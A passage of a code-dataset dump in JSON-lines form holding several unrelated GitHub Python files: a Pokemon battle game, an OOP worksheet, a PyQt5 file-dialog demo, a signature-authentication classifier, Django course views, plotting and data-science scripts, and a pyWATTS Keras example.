3):\n drain = random.randint(5,20)\n epp -= drain\n pp += drain\n message(pokemon + \" used {0}, you drained {1} mana!\".format(attacks[2], drain), bcolors.OKBLUE)\n elif(attack == 4):\n if(pp >= 10):\n if(tbDelay == 0):\n tbDelay = 3\n pp -= 10\n dmg = random.randint(1,3)\n ehealth -= round(20*dmg / edefense, 0)\n message(pokemon + \" used {0}, you did {1} damage!\".format(attacks[3], round(20*dmg/edefense,0)), bcolors.OKBLUE)\n if(random.randint(0,1) == 1 and edefense > 1):\n edefense -= 1\n else:\n message('Thunderbolt has a cooldown of 3 rounds, you have {0} left!'.format(tbDelay), bcolors.FAIL)\n atk()\n else:\n message(pokemon + \" doesn't have enough pp!\", bcolors.FAIL)\n atk()\n else:\n message(pokemon + \" was confused, it did no damage.\", bcolors.FAIL)\n missTurn = 0\n\n if(tbDelay > 0):\n tbDelay -= 1\n checkHealth()\n eatk()\n\npossible_moves = [1,2,3,4]\ndef eatk():\n global pp\n global health\n global defense\n global enemyMissTurn\n global missTurn\n global epp\n global possible_moves\n\n if(epp < 5 or pp <= 0 ):\n if(2 in possible_moves): possible_moves.remove(2)\n elif(2 not in possible_moves):\n possible_moves.append(2)\n if(epp < 10 and 4 in possible_moves):\n possible_moves.remove(4)\n elif(4 not in possible_moves):\n possible_moves.append(4)\n\n attack = random.choice(possible_moves)\n\n if(not enemyMissTurn):\n if(attack == 1):\n health -= round(10 / edefense, 0)\n message(\"The enemy used {0}, it did {1} damage!\".format(attacks[0], round(10/edefense, 0)), bcolors.OKBLUE)\n elif(attack == 2):\n pp -= 5\n message(\"The enemy used {0}.\".format(attacks[1]), bcolors.OKBLUE)\n if(random.randint(1,4) == 4):\n missTurn = 1\n elif(attack == 3):\n drain = random.randint(5,20)\n pp -= drain\n epp += drain\n message(\"The enemy used {0}, they drained {1} mana!\".format(attacks[2], drain), bcolors.OKBLUE)\n elif(attack == 4):\n pp -= 10\n dmg = random.randint(1,3)\n health -= round(20*dmg / edefense,0)\n message(\"The enemy used {0}, they did {1} damage!\".format(attacks[3], round(20*dmg/defense),0), bcolors.OKBLUE)\n if(random.randint(0,1) == 1 and defense > 1):\n defense -= 1\n else:\n message(\"The enemies pokemon is confused, it did no damage.\", bcolors.FAIL)\n enemyMissTurn = 0\n \n\n \n makeScreen()\n checkHealth()\n printStats()\n atk()\n\natk()","repo_name":"OmerSabic/Pokemon","sub_path":"battle.py","file_name":"battle.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28782547279","text":"print(\"\\nQ1a\\n\")\n# Q1a: Create a class which of a country (include continent, climate, language etc in the inputs)\n# A1a:\n\nclass Country():\n def __init__(self, continent, climate, language):\n self.continent = continent\n self.climate = climate\n self.language = language\n\nprint(\"\\nQ1b\\n\")\n# Q1b: Create a subclass of a city which inherits from the country class\n# A1b:\n\n\nclass City(Country):\n def __init__(self, continent, climate, language):\n super().__init__(continent, climate, language)\n\n# -------------------------------------------------------------------------------------- #\nprint(\"\\nQ2a\\n\")\n# Q2a: Using the predefined class and is_prime method below, loop through list_of_numbers and create\n# a list of primes from that list\nlist_of_numbers = [1, 12, 44, 53, 6, 3, 6545, 76, 32, 345, 22, 17, 19, 223, 156]\n\n\nclass Number:\n def __init__(self, integer):\n self.integer = integer\n\n def is_prime(self):\n if self.integer >= 2:\n for x in range(2, self.integer):\n if self.integer % x == 0:\n return False\n return True\n\n else:\n return False\n def divisible_by_n(self, n):\n if self.integer % n == 0:\n return True\n else:\n return False\n# A2a:\nprime_list = []\nfor i in (list_of_numbers):\n #print(i)\n test_num = Number(i)\n if test_num.is_prime():\n prime_list.append(i)\nprint(prime_list)\n\nprint(\"\\nQ2b\\n\")\n# Q2b: Now create a list of numbers from list_of_numbers that are divisible\n# by both 3 and 4 using the divisible_by_n method above\n\ndivisible_by_3_and_4 = []\n\nfor i in list_of_numbers:\n test_num = Number(i)\n if test_num.divisible_by_n(3) and test_num.divisible_by_n(4):\n divisible_by_3_and_4.append(i)\nprint(divisible_by_3_and_4)\n# A2b:\n# -------------------------------------------------------------------------------------- #\nprint(\"\\nQ3a\\n\")\n# Q3a: Fix the following class and subclass (uncomment by selecting all rows and pressing CTRL + /)\nclass Boss(object):\n def __init__(self, name, attitude, behaviour, face):\n self.name = name\n self.attitude = attitude\n self.behaviour = behaviour\n self.face = face\n\n def get_attitude(self):\n return self.attitude\n\n def get_behaviour(self):\n return self.behaviour\n\n def get_face(self):\n return self.face\n\n\nclass GoodBoss(Boss):\n def __init__(self, name, attitude, behaviour, face):\n super().__init__(name, attitude, behaviour, face)\n\n def encourage(self):\n print(f\"The team cheers for {self.name}, starts shouting awesome slogans then gets back to work.\")\n# A3a:\n\n#Finish the function worksheet\n\n#Finish the OOP worksheet\n\n#Refactor your fizzbuzz game to use functions / classes","repo_name":"jo763/eng-99-python","sub_path":"OOP/worksheet.py","file_name":"worksheet.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40331736935","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@Time : 2017/5/5 22:28\n@Author : Zeroxus\n@Site : \n@File : fileDialog.py\n@Software: PyCharm\n'''\n\nimport sys\n\nfrom PyQt5.QtWidgets import QApplication,QMainWindow,QTextEdit,QAction,QFileDialog\nfrom PyQt5.QtGui import QIcon\n\nclass Example(QMainWindow):\n #设置了一个文本编辑框,文本编辑框是基于QMainWindow组件的。\n def __init__(self):\n super().__init__()\n\n self.initUI()\n\n def initUI(self):\n self.textEdit = QTextEdit()\n self.setCentralWidget(self.textEdit)\n self.statusBar()\n\n openFile = QAction(QIcon('dog.png'),'Open',self)\n openFile.setShortcut('Ctrl+O')\n openFile.setStatusTip('Open new file')\n openFile.triggered.connect(self.showDialog)\n\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&File')\n fileMenu.addAction(openFile)\n\n self.setGeometry(300,300,350,300)\n self.setWindowTitle('File Dialog')\n self.show()\n\n def showDialog(self):\n #弹出QFileDialog窗口。getOpenFileName()方法的第一个参数是说明文字,\n # 第二个参数是默认打开的文件夹路径。默认情况下显示所有类型的文件\n fname = QFileDialog.getOpenFileName(self,'Open File', '/home')\n #读取选中的文件,并显示在文本编辑框内\n if fname[0]:\n f = open(fname[0],'r')\n\n with f:\n data = f.read()\n self.textEdit.setText(data)\n\nif __name__=='__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())","repo_name":"Zeroxus/pyqt5-demos","sub_path":"fileDialog.py","file_name":"fileDialog.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15826240441","text":"import numpy as np\nimport os\nimport torch.utils.data as data# 축약금지\nimport cv2\nimport copy\n\nclass CenternetDetPatchDataset(data.Dataset):\n\tdefault_resolution = [512, 512]\n\tmean = np.array([0, 0, 0],\n\t\t\t\t dtype=np.float32).reshape(1, 1, 3)\n\tstd = np.array([1, 1, 1],\n\t\t\t\t dtype=np.float32).reshape(1, 1, 3)\n\n\tdef __init__(self,opt,patch_labels,back_labels,class_name,negative_labels=None,dataset_capacity=8192):\n\t\tsuper(CenternetDetPatchDataset, self).__init__()\n\t\tself.data_dir=opt.data_dir\n\t\tself.max_objs = 128\n\t\tself._data_rng = np.random.RandomState(123)\n\t\tself._eig_val = np.array([0.2141788, 0.01817699, 0.00341571],\n\t\t\t\t\t\t\t\t dtype=np.float32)\n\t\tself._eig_vec = np.array([\n\t\t\t[-0.58752847, -0.69563484, 0.41340352],\n\t\t\t[-0.5832747, 0.00994535, -0.81221408],\n\t\t\t[-0.56089297, 0.71832671, 0.41158938]\n\t\t], dtype=np.float32)\n\t\topt.class_name=class_name\n\t\tself.opt=opt\n\t\tself.patch_labels = self.load_patch(copy.deepcopy(patch_labels))\n\t\tself.back_labels = self.load_imgs(raw_labels=copy.deepcopy(back_labels),type=cv2.IMREAD_COLOR)\n\t\tself.negative_labels=self.load_imgs(raw_labels=copy.deepcopy(negative_labels),type=cv2.IMREAD_COLOR)\n\t\tself.class_name = opt.class_name\n\t\tself.num_classes=len(self.class_name)\n\t\tself.class_to_ind = dict(zip(self.class_name, range(self.num_classes)))\n\t\tself.dataset_capacity=dataset_capacity\n\n\n\tdef load_imgs(self,raw_labels,size=512,type=cv2.IMREAD_UNCHANGED):\n\t\timgs = []\n\t\tfor dir in raw_labels:\n\t\t\timg = cv2.imread(dir, type)\n\t\t\tif (img is not None):\n\t\t\t\timg = cv2.resize(img, (size, size))\n\t\t\t\timgs.append(img)\n\t\treturn imgs\n\n\tdef load_patch(self,raw_labels,size=512,keep_ratio=True, type=cv2.IMREAD_UNCHANGED):\n\t\tfor i in range(len(raw_labels)):\n\t\t\tlabels=raw_labels[i]\n\t\t\tfor key in labels.keys():\n\t\t\t\timg_dirs=labels[key]\n\t\t\t\timgs=[]\n\t\t\t\tfor dir in img_dirs:\n\t\t\t\t\timg=cv2.imread(dir,type)\n\t\t\t\t\tif(img is not None):\n\t\t\t\t\t\tif(keep_ratio==True):\n\t\t\t\t\t\t\th,w,_=img.shape\n\t\t\t\t\t\t\tlength=max(h,w)\n\t\t\t\t\t\t\tscale=1\n\t\t\t\t\t\t\tif(length>size):\n\t\t\t\t\t\t\t\tscale=size/length\n\t\t\t\t\t\t\t\timg=cv2.resize(img,None,fx=scale,fy=scale)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\timg=cv2.resize(img,(size,size))\n\t\t\t\t\t\timgs.append((img,dir))\n\t\t\t\tlabels[key]=imgs\n\t\treturn raw_labels\n\n\n\tdef __len__(self):\n\t\treturn self.dataset_capacity\n\n\n","repo_name":"jhcnode/pytorch-Centernet-for-synthetic-data","sub_path":"lib/datasets/dataset/centernet_det_patch0.py","file_name":"centernet_det_patch0.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18671996822","text":"import tkinter as tk\r\nfrom tkinter.ttk import *\r\nfrom tkinter.filedialog import askopenfilename\r\nimport tensorflow._api.v2.compat.v1 as tf\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom time import time\r\nimport keras\r\nfrom skimage.filters import threshold_otsu\r\nfrom scipy import ndimage\r\nfrom skimage.measure import regionprops\r\nimport os\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\nfrom PIL import Image\r\nfrom mpl_toolkits import mplot3d\r\nfrom tkinter import messagebox\r\nimport customtkinter\r\n\r\n\r\ntf.disable_v2_behavior()\r\n\r\ngenuine_image_paths = r\"C:\\Users\\Marion\\Desktop\\ELECTRONIC SIGNATURE AUTHENTICATION\\ELECRONIC SIGNATURE\"\r\nforged_image_paths = r\"C:\\Users\\Marion\\Desktop\\ELECTRONIC SIGNATURE AUTHENTICATION\\ELECTRONIC FORGERY\"\r\n\r\ndef rgbgrey(img):\r\n # Converts rgb to grayscale\r\n greyimg = np.zeros((img.shape[0], img.shape[1]))\r\n for row in range(len(img)):\r\n for col in range(len(img[row])):\r\n greyimg[row][col] = np.average(img[row][col])\r\n return greyimg\r\n\r\n\r\ndef greybin(img):\r\n # Converts grayscale to binary\r\n blur_radius = 0.8\r\n img = ndimage.gaussian_filter(img, blur_radius) # to remove small components or noise\r\n # img = ndimage.binary_erosion(img).astype(img.dtype)\r\n thres = threshold_otsu(img)\r\n binimg = img > thres\r\n binimg = np.logical_not(binimg)\r\n return binimg\r\n\r\n\r\ndef preproc(path, img=None, display=True):\r\n if img is None:\r\n img = mpimg.imread(path)\r\n if display:\r\n plt.imshow(img)\r\n plt.show()\r\n grey = rgbgrey(img) # rgb to grey\r\n if display:\r\n plt.imshow(grey, cmap=matplotlib.cm.Greys_r)\r\n plt.show()\r\n binimg = greybin(grey) # grey to binary\r\n if display:\r\n plt.imshow(binimg, cmap=matplotlib.cm.Greys_r)\r\n plt.show()\r\n r, c = np.where(binimg == 1)\r\n # Now we will make a bounding box with the boundary as the position of pixels on extreme.\r\n # Thus we will get a cropped image with only the signature part.\r\n signimg = binimg[r.min(): r.max(), c.min(): c.max()]\r\n if display:\r\n plt.imshow(signimg, cmap=matplotlib.cm.Greys_r)\r\n plt.show()\r\n return signimg\r\n\r\n\r\ndef Ratio(img):\r\n a = 0\r\n for row in range(len(img)):\r\n for col in range(len(img[0])):\r\n if img[row][col] == True:\r\n a = a + 1\r\n total = img.shape[0] * img.shape[1]\r\n return a / total\r\n\r\n\r\ndef Centroid(img):\r\n numOfWhites = 0\r\n a = np.array([0, 0])\r\n for row in range(len(img)):\r\n for col in range(len(img[0])):\r\n if img[row][col] == True:\r\n b = np.array([row, col])\r\n a = np.add(a, b)\r\n numOfWhites += 1\r\n rowcols = np.array([img.shape[0], img.shape[1]])\r\n centroid = a / numOfWhites\r\n centroid = centroid / rowcols\r\n return centroid[0], centroid[1]\r\n\r\n\r\ndef EccentricitySolidity(img):\r\n r = regionprops(img.astype(\"int8\"))\r\n return r\r\n\r\n[0].eccentricity, r[0].solidity\r\n\r\n\r\ndef SkewKurt(img):\r\n if np.sum(img) != 0:\r\n M = cv2.moments(img)\r\n skew = round(float(M['mu11']) / float(M['mu02']), 2)\r\n kurt = round(float(M['mu40']) / float(M['mu02']), 2)\r\n return skew, kurt\r\n else:\r\n return 0, 0\r\n\r\n\r\ndef extract_features(image_path):\r\n img = preproc(image_path, img=None, display=False)\r\n ratio = Ratio(img)\r\n centroid_x, centroid_y = Centroid(img)\r\n eccentricity, solidity = EccentricitySolidity(img)\r\n skewness, kurtosis = SkewKurt(img)\r\n features = [ratio, centroid_x, centroid_y, eccentricity, solidity, skewness, kurtosis]\r\n return features\r\n\r\n\r\ndef create_dataset(genuine_paths, forged_paths):\r\n data = []\r\n labels = []\r\n for path in genuine_paths:\r\n features = extract_features(path)\r\n data.append(features)\r\n labels.append(1) # genuine class label: 1\r\n for path in forged_paths:\r\n features = extract_features(path)\r\n data.append(features)\r\n labels.append(0) # forged class label: 0\r\n return data, labels\r\n\r\n\r\ndef normalize_data(data):\r\n data = np.array(data)\r\n data = (data - np.min(data, axis=0)) / (np.max(data, axis=0) - np.min(data, axis=0))\r\n return data\r\n\r\n\r\ndef train_test_split(data, labels, test_size=0.2):\r\n num_samples = len(data)\r\n num_test_samples = int(test_size * num_samples)\r\n indices = np.random.permutation(num_samples)\r\n test_indices = indices[:num_test_samples]\r\n train_indices = indices[num_test_samples:]\r\n train_data = data[train_indices]\r\n train_labels = np.array(labels)[train_indices]\r\n test_data = data[test_indices]\r\n test_labels = np.array(labels)[test_indices]\r\n return train_data, train_labels, test_data, test_labels\r\n\r\n\r\ndef create_model(input_shape):\r\n model = tf.keras.Sequential()\r\n model.add(tf.keras.layers.Dense(100, activation='relu', input_shape=input_shape))\r\n model.add(tf.keras.layers.Dense(100, activation='relu'))\r\n model.add(tf.keras.layers.Dense(100, activation='relu'))\r\n model.add(tf.keras.layers.Dense(1, activation='sigmoid'))\r\n model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\r\n return model\r\n\r\n\r\ndef train_model(train_data, train_labels, input_shape, epochs=100):\r\n model = create_model(input_shape)\r\n model.fit(train_data, train_labels, epochs=epochs, verbose=0)\r\n return model\r\n\r\n\r\ndef evaluate_model(model, test_data, test_labels):\r\n _, accuracy = model.evaluate(test_data, test_labels, verbose=0)\r\n return accuracy\r\n\r\n\r\ndef predict(model, data):\r\n predictions = model.predict(data)\r\n return predictions.flatten()\r\n\r\n\r\ndef get_prediction_label(prediction):\r\n if prediction >= 0.5:\r\n return \"Genuine\"\r\n else:\r\n return \"Forged\"\r\n\r\n\r\ndef open_file_dialog():\r\n filename = askopenfilename(filetypes=((\"Image files\", \"*.png;*.jpg;*.jpeg\"), (\"All files\", \"*.*\")))\r\n if filename:\r\n img = Image.open(filename)\r\n img = img.resize((200, 200))\r\n img = ImageTk.PhotoImage(img)\r\n image_panel.configure(image=img)\r\n image_panel.image = img\r\n predict_button.configure(state=\"normal\")\r\n clear_button.configure(state=\"normal\")\r\n filepath_entry.delete(0,\r\n\r\n tk.END)\r\n filepath_entry.insert(0, filename)\r\n\r\n\r\ndef clear_image():\r\n image_panel.configure(image=\"\")\r\n predict_button.configure(state=\"disabled\")\r\n clear_button.configure(state=\"disabled\")\r\n filepath_entry.delete(0, tk.END)\r\n\r\n\r\ndef predict_signature():\r\n filepath = filepath_entry.get()\r\n if os.path.exists(filepath):\r\n features = extract_features(filepath)\r\n features = normalize_data([features])\r\n prediction = predict(model, features)\r\n label = get_prediction_label(prediction[0])\r\n messagebox.showinfo(\"Prediction\", f\"The signature is {label}.\")\r\n else:\r\n messagebox.showerror(\"Error\", \"Invalid file path.\")\r\n\r\n\r\ngenuine_image_paths = [os.path.join(genuine_image_paths, filename) for filename in os.listdir(genuine_image_paths)]\r\nforged_image_paths = [os.path.join(forged_image_paths, filename) for filename in os.listdir(forged_image_paths)]\r\n\r\ndata, labels = create_dataset(genuine_image_paths, forged_image_paths)\r\ndata = normalize_data(data)\r\ninput_shape = (len(data[0]),)\r\n\r\ntrain_data, train_labels, test_data, test_labels = train_test_split(data, labels)\r\nmodel = train_model(train_data, train_labels, input_shape)\r\naccuracy = evaluate_model(model, test_data, test_labels)\r\nprint(\"Model Accuracy:\", accuracy)\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Signature Authenticator\")\r\nroot.geometry(\"400x300\")\r\n\r\nfilepath_label = tk.Label(root, text=\"File Path:\")\r\nfilepath_label.pack()\r\n\r\nfilepath_entry = tk.Entry(root, width=30)\r\nfilepath_entry.pack()\r\n\r\nbrowse_button = tk.Button(root, text=\"Browse\", command=open_file_dialog)\r\nbrowse_button.pack()\r\n\r\nimage_panel = tk.Label(root)\r\nimage_panel.pack()\r\n\r\npredict_button = tk.Button(root, text=\"Predict\", command=predict_signature, state=\"disabled\")\r\npredict_button.pack()\r\n\r\nclear_button = tk.Button(root, text=\"Clear\", command=clear_image, state=\"disabled\")\r\nclear_button.pack()\r\n\r\nroot.mainloop()","repo_name":"Oruhmarion/Signature-authentication","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43321480885","text":"#! /usr/bin/env python\n\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.models import Label, Title\n\n\ndef plot_single_drift_simulation(xdata, ydata, output_filename):\n output_file(output_filename)\n\n p = figure(\n plot_width=600, plot_height=600,\n x_axis_label=\"Generations\", y_axis_label=\"Frequency\",\n y_range=(0,1)\n )\n\n # add a line renderer\n p.line(xdata, ydata, line_width=1)\n\n title = Title(text=\"The Effect of Genetic Drift\", align=\"center\")\n p.add_layout(title, \"above\")\n\n show(p)\n\n\ndef plot_multiple_drift_simulations(xdata_list, ydata_list, output_filename):\n # this probably works for just one simulation as well\n # thus, making above function absolete\n from bokeh.palettes import Spectral11\n output_file(output_filename)\n\n p = figure(\n plot_width=600, plot_height=600,\n x_axis_label=\"Generations\", y_axis_label=\"Frequency\",\n y_range=(0,1)\n )\n\n palette = Spectral11[0:len(xdata_list)]\n\n p.multi_line(\n xs=xdata_list, ys=ydata_list,\n line_color=palette, line_width=2\n )\n\n title = Title(text=\"The Effect of Genetic Drift\", align=\"center\")\n p.add_layout(title, \"above\")\n\n show(p)\n","repo_name":"mccannj9/PopPyGen","sub_path":"Plotters/BokehWrappers.py","file_name":"BokehWrappers.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"24245859735","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import Curso\nfrom datetime import datetime\n\n# Create your views here.\ndef acessar_curso(request):\n return render(request, 'acessar_curso.html') \n # HttpResponse('Olá mundo!')\n\ndef listar_curso(request):\n nome_filtrar = request.GET.get('nome_filtrar')\n carga_horaria_filtrar = request.GET.get('carga_horaria')\n\n\n curso = Curso.objects.all()\n \n if nome_filtrar:\n curso = curso.filter(nome__contains=nome_filtrar)\n\n #curso = Curso.objects.filter(nome__contains=nome_filtrar)\n #else:\n # curso = Curso.objects.all()\n\n if carga_horaria_filtrar:\n curso = curso.filter(carga_horaria__gte=carga_horaria_filtrar)\n \n return render(request, 'listar_curso.html', {'curso':curso}) \n\ndef criar_curso(request):\n\n if request.method == \"GET\":\n status = request.GET.get('status')\n\n return render(request, 'criar_curso.html', {'status': status})\n elif request.method == \"POST\":\n #print(request.POST.get('nome'))\n #print(request.POST.get('carga_horaria'))\n nome_digitado= request.POST.get('nome')\n carga_horaria_digitado = request.POST.get('carga_horaria')\n\n curso = Curso(\n nome= nome_digitado,\n carga_horaria=carga_horaria_digitado,\n data_criacao=datetime.now()\n )\n curso.save()\n\n return redirect('/curso/criar_curso/?status=1')\n\ndef ver_curso(request, id):\n curso = Curso.objects.get(id=id)\n return render(request, 'ver_curso.html', {'curso': curso}) #HttpResponse(id)\n\ndef deletar_curso(request, id):\n curso = Curso.objects.get(id=id)\n #curso.delete()\n curso.ativo = False\n curso.save()\n return redirect('/curso/listar_curso')\n\n","repo_name":"henrimory/Treinando-Python-Django","sub_path":"cursos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42720150212","text":"# make_new_archive.py sets up for a NEW set of runs, for example if\n# you have changed the reference data, maps, or zones files. It\n# does not run any analyses itself, but it creates the archive and\n# edits the ivory_paths file to point at it. It must be given an \n# archive name that, when combined with the archive root found in\n# ivory_paths.tsv, does NOT point to any existing archive.\n\n# Run this in the parent directory of all seizures\n\nimport sys\nimport os\nimport subprocess\nfrom subprocess import Popen, PIPE\nimport ivory_lib as iv\n\n############################################################################\n## main program\n\nif len(sys.argv) != 3:\n print(\"USAGE: python3 make_new_archive.py pathsfile.tsv new_archive\")\n exit(-1)\n\npathsfile = os.path.abspath(sys.argv[1])\nnew_archname = sys.argv[2]\nif not new_archname.endswith(\"/\"):\n new_archname += \"/\"\n\n# read ivory_paths.tsv file\npathdir = iv.readivorypath(pathsfile)\narch_dir, old_archname = pathdir[\"fammatch_archive_dir\"]\n\n# base directory must exist\nif not os.path.isdir(arch_dir):\n print(\"Archive base directory\",arch_dir,\"does not exist\")\n print(\"Did you forget to mount the hard drive?\")\n exit(-1)\n\n# the new archive must not exist\nif os.path.isdir(arch_dir + new_archname):\n print(\"Cannot create new archive\",new_archname,\"as it already exists\")\n exit(-1)\n\n# create new archive and subdirectories within it\ncommand = [\"mkdir\",arch_dir + new_archname]\niv.run_and_report(command, \"Unable to create archive\")\ntry:\n command = [\"mkdir\",arch_dir + new_archname + \"old_inputs\"]\n iv.run_and_report(command, \"Unable to create subdirectory 'old_inputs'\")\n command = [\"mkdir\",arch_dir + new_archname + \"reference\"]\n iv.run_and_report(command, \"Unable to create subdirectory 'reference'\")\nexcept:\n print(\"Archive could not be completely created; deleting it\")\n command = [\"rm -rf\",arch_dir + new_archname]\n iv.run_and_report(command,\"Could not delete failed archive\")\n exit(-1)\n\nprint(\"New archive created as\",arch_dir + new_archname)\n\n# Edit ivory_paths to point at new archive\nfound_archive = False\nfound_meta = False\npathdata = open(pathsfile,\"r\").readlines()\nnewpathdata = []\nfor line in pathdata:\n if line.startswith(\"fammatch_archive_dir\"):\n newline = [\"fammatch_archive_dir\",arch_dir,new_archname]\n newline = \"\\t\".join(newline) + \"\\n\"\n newpathdata.append(newline)\n found_archive = True\n elif line.startswith(\"metadata_prefix\"):\n parts = line.split(\"\\t\")\n newline = [parts[0],arch_dir + new_archname,parts[2]]\n newline = \"\\t\".join(newline) # parts didn't get rstrip(), so no xtra \"\\n\" needed\n newpathdata.append(newline)\n found_meta = True\n else:\n newpathdata.append(line)\nprint(\"Name of fammatch archive changed in\",pathsfile)\n\nif not found_archive:\n print(\"Could not find fammatch_archive_dir entry in\",pathsfile)\n print(\"Hand-edit this file to add the new archive before proceeding\")\nelif not found_meta:\n print(\"Could not find metadata_prefix entry in\",pathsfile)\n print(\"Hand-edit this file to add the new archive before proceeding\")\nelse:\n pathout = open(pathsfile,\"w\")\n for line in newpathdata:\n pathout.write(line)\n pathout.close()\n","repo_name":"mkkuhner/ivory_pipeline","sub_path":"src/make_new_archive.py","file_name":"make_new_archive.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21909871741","text":"import cv2\nimport os\nimport numpy as np\n\n# Read the image and convert to grayscale\nimage_path = \"test5\\image84-1.tiff\"\nimage_name = os.path.basename(image_path)\nimage = cv2.imread(image_path)\ngray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Apply Gaussian blur to reduce noise\nblurred_image = cv2.GaussianBlur(gray_image, (5, 5), 0)\n\n# Apply Hough Circle Transform to detect circles\ncircles = circles = cv2.HoughCircles(blurred_image,cv2.HOUGH_GRADIENT,1,20,\n param1=60,param2=40,minRadius=650,maxRadius=660)\ncircles = np.uint16(np.around(circles))\n\n# Find the circle with the highest accumulator value (param2)\nmax_acc_value = 0\nselected_circle = None\nfor circle in circles[0, :]:\n x, y, r = circle\n if r > max_acc_value:\n max_acc_value = r\n selected_circle = circle\n \n\n\n# Get the bounding box of the circle\nx, y, r = selected_circle\nx, y, r = int(x), int(y), int(r)\nx1, y1, x2, y2 = x - r, y - r, x + r, y + r\n\n# Crop the image using the bounding box\ncropped_image = image[y1:y2, x1:x2]\n\n# Save the cropped image\ncv2.imwrite(image_name, cropped_image)\n\n# Display the original and cropped images (optional)\ncv2.imshow(\"Original Image\", image)\ncv2.imshow(\"Cropped Image\", selected_circle)\n# cv2.imwrite( 'Cropped_circles.jpg', cropped_image)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"xc720/Rotated_contact_lense","sub_path":"Rotation_calculation/OBR/circle_detection.py","file_name":"circle_detection.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72064912250","text":"# -----------------------------------------------------------\n# This example presents the code used in the advanced example\n# guide in the pyWATTS documentation.\n# -----------------------------------------------------------\n\nimport pandas as pd\nfrom keras import layers, Model\nfrom pywatts_pipeline.core.pipeline import Pipeline\n# From pyWATTS the pipeline is imported\nfrom pywatts_pipeline.core.util.computation_mode import ComputationMode\nfrom sklearn.preprocessing import StandardScaler\nfrom keras import backend as K\n\nfrom pywatts.callbacks import LinePlotCallback\n# Import the pyWATTS pipeline and the required modules\nfrom pywatts.modules import LinearInterpolater, SKLearnWrapper, KerasWrapper, Select\nfrom pywatts.summaries import RMSE\n\n\ndef get_keras_model():\n # write the model with the Functional API, Sequential does not support multiple input tensors\n\n input_1 = layers.Input(shape=(24,),\n name='lag_features') # layer name must match time series name\n hidden = layers.Dense(10,\n activation='tanh',\n name='hidden')(input_1)\n output = layers.Dense(24,\n activation='linear',\n name='target')(hidden) # layer name must match time series name\n model = Model(inputs=[input_1], outputs=output)\n return model\n\n\nif __name__ == \"__main__\":\n keras_model = get_keras_model()\n\n pipeline = Pipeline(path=\"../results/keras_model\")\n\n # Deal with missing values through linear interpolation\n imputer_power_statistics = LinearInterpolater(method=\"nearest\", dim=\"time\",\n name=\"imputer_power\")(x=pipeline[\"load_power_statistics\"])\n\n # Scale the data using a standard SKLearn scaler\n power_scaler = SKLearnWrapper(module=StandardScaler(), name=\"scaler_power\")\n scale_power_statistics = power_scaler(x=imputer_power_statistics)\n\n # Create lagged time series to later be used in the regression\n # sampler_module -> 2D-Zeitreihe\n lag_features = Select(start=-23, stop=1, step=1, name=\"lag_features\")(x=scale_power_statistics)\n target = Select(start=1, stop=25, step=1, name=\"target\")(x=scale_power_statistics)\n target_unscaled = Select(start=1, stop=25, step=1, name=\"target\")(x=imputer_power_statistics)\n\n keras_wrapper = KerasWrapper(keras_model,\n custom_objects={\"\": lambda x, y: K.sqrt(K.mean(K.square(x - y)))},\n fit_kwargs={\"batch_size\": 8, \"epochs\": 1},\n compile_kwargs={\"loss\": lambda x, y: K.sqrt(K.mean(K.square(x - y))),\n \"optimizer\": \"Adam\",\n \"metrics\": [\"mse\"]}) \\\n (lag_features=lag_features,\n target=target)\n\n inverse_power_scale_dl = power_scaler(x=keras_wrapper,\n computation_mode=ComputationMode.Transform,\n method=\"inverse_transform\",\n callbacks=[LinePlotCallback(\"prediction\")])\n\n rmse_dl = RMSE()(keras_model=inverse_power_scale_dl, y=target_unscaled)\n\n # Now, the pipeline is complete\n # so we can load data and train the model\n data = pd.read_csv(\"../data/getting_started_data.csv\",\n index_col=\"time\",\n parse_dates=[\"time\"],\n infer_datetime_format=True,\n sep=\",\")\n\n pipeline.train(data[:6000])\n pipeline.test(data[6000:])\n pipeline.to_folder(\"pipe_keras\")\n\n pipeline = Pipeline.from_folder(\"pipe_keras\")\n pipeline.test(data[6000:])\n print(\"Finished\")\n","repo_name":"KIT-IAI/pyWATTS","sub_path":"examples/example_keras.py","file_name":"example_keras.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"77"} +{"seq_id":"29260657319","text":"'''\n entro.py calculates the entropy of a given string or file\n\n This uses the negative sum of the log (to the base of 2) of the probability\n times the probability of a char to occur in a certain string as the entropy.\n'''\n# 